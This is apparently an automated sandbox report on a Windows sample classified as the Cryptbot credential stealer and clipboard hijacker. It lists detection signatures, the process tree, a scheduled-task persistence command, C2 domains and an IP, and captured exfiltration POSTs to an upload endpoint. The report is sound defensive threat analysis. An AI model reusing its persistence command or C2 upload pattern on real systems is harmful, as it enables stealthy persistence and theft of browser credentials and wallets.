Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521587
MD5:	18e1d0f8b01ceae85d5d7136c4cf751a
SHA1:	6d79a8cb0795d48ddf9bcf3ff97af16a4508f770
SHA256:	d73bea0eaec1c09fe508f58746a99586c3369be41d08845ba12764a4b2f2a147
Tags:	exeuser-jstrosch
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 18E1D0F8B01CEAE85D5D7136C4CF751A)

service123.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: F48DE3A26F00253050481FA7F5CD3EC3)

schtasks.exe (PID: 4448 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 6408 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: F48DE3A26F00253050481FA7F5CD3EC3)

service123.exe (PID: 5404 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: F48DE3A26F00253050481FA7F5CD3EC3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["fivevh5pt.top", "analforeverlovyu.top", "@fivevh5pt.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2778604141.00000000049F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 2228	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 2228	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2228	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 7148	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.service123.exe.6c380000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2228, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 4448, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-29T00:53:24.312365+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49725	84.38.182.221	80	TCP
2024-09-29T00:53:27.885702+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49729	84.38.182.221	80	TCP
2024-09-29T00:53:32.795410+0200	2054350	1	A Network Trojan was detected	192.168.2.5	49730	84.38.182.221	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: file.exe.2228.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["fivevh5pt.top", "analforeverlovyu.top", "@fivevh5pt.top"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	4_2_00CB15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB83F5 CryptGenRandom,CryptReleaseContext,	4_2_00CB83F5
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3814B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	4_2_6C3814B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	4_2_00CB81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FAC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C422EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C39AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C45F990h	4_2_6C39E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	4_2_6C4204E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3AE490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C3AE490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C3A04F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3A0610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C3AA720
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3AA790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C3AA790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C3A0010
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C45D014h]	4_2_6C454110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C428250
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3A4203
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C3AC2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C3AA330
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3AA3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C3AA3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FBDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FBF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	4_2_6C3D9F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C3D9910
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C439900
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C3BB98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C3BB987
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FBAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3F7AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	4_2_6C3AD424
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C45DFF4h	4_2_6C3F3440
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	4_2_6C3AD5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C3F35F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	4_2_6C3AD724
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3AD050
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C417100
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C3AD2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C3FB280
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_6C3F93B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49730 -> 84.38.182.221:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49725 -> 84.38.182.221:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49729 -> 84.38.182.221:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fivevh5pt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: @fivevh5pt.top

Source: Joe Sandbox View

IP Address: 84.38.182.221 84.38.182.221

Source: Joe Sandbox View

ASN Name: SELECTELRU SELECTELRU

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary20269735User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: fivevh5pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary45974977User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89154Host: fivevh5pt.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary48429912User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30023Host: fivevh5pt.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fivevh5pt.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary20269735User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 411Host: fivevh5pt.top

Source: file.exe, 00000000.00000003.2290854953.0000000001FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivevh5pt.top/9
Source: file.exe, 00000000.00000002.2798866199.0000000001FE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fivevh5pt.top/v1/upload.php
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IZImiIFXXrvtVOHFozZW.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2331655300.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C399B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

4_2_6C399B99

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C399B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

4_2_6C399B99

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\file.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB51B0	4_2_00CB51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00CB3E20	4_2_00CB3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C38CD00	4_2_6C38CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C38EE50	4_2_6C38EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C444E80	4_2_6C444E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C390FC0	4_2_6C390FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D0870	4_2_6C3D0870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C2A7E	4_2_6C3C2A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C4490	4_2_6C3C4490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3944F0	4_2_6C3944F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3B8570	4_2_6C3B8570
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C0580	4_2_6C3C0580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3B2110	4_2_6C3B2110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3CFE10	4_2_6C3CFE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C1E40	4_2_6C3C1E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C395880	4_2_6C395880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3CD99E	4_2_6C3CD99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3DDA20	4_2_6C3DDA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3AF510	4_2_6C3AF510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3B96A0	4_2_6C3B96A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C77D0	4_2_6C3C77D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C383000	4_2_6C383000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3970C0	4_2_6C3970C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3C11BE	4_2_6C3C11BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3D12C0	4_2_6C3D12C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3CF3C0	4_2_6C3CF3C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C455A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C455980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C453490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C44AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C4538D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C453310 appears 43 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\DLumCLJacW

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\NlVquRWTOzXSpoxOdrYz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2331934508.0000000003E9D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: izimiifxxrvtvohfozzw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: izimiifxxrvtvohfozzw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
